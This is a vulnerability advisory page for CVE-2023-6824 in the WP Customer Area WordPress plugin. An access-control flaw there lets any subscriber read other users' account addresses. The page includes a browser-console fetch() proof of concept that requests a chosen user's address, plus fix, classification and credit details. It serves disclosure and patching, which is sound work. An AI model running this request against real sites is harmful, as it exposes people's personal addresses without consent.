WP Customer Area < 8.2.1 – Subscriber+ Account Address Leak | CVE 2023-6824 | Plugin Vulnerabilities

Description

The plugin does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user's account address.

Proof of Concept

Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
      "body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}).then((response) => {return response.text();    })
    .then((data) => {
      console.log(data);
    });

Affects Plugins

Fixed in 8.2.1

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

a224b984-770a-4534-b689-0701b582b388

Timeline

Publicly Published

2024-01-10 (about 1 year ago)

Added

2024-01-10 (about 1 year ago)

Last Updated

2024-01-16 (about 1 year ago)

Other

Published

Title

Published

2024-01-17

Title

Contact Form builder with drag & drop - Kali Forms < 2.3.37 - Insecure Direct Object Reference

Published

2024-03-26

Title

Event Tickets and Registration < 5.8.3 - Improper Authorization to Information Disclosure

Published

2026-01-06

Title

Optional Email <= 1.3.11 - Unauthenticated Privilege Escalation to Account Takeover

Published

2024-11-08

Title

Attesa Extra < 1.4.3 - Authenticated (Contributor+) Post Disclosure

Published

2024-08-16

Title

Stripe Payments For WooCommerce by Checkout < 1.9.2 - Unauthenticated Insecure Direct Object Reference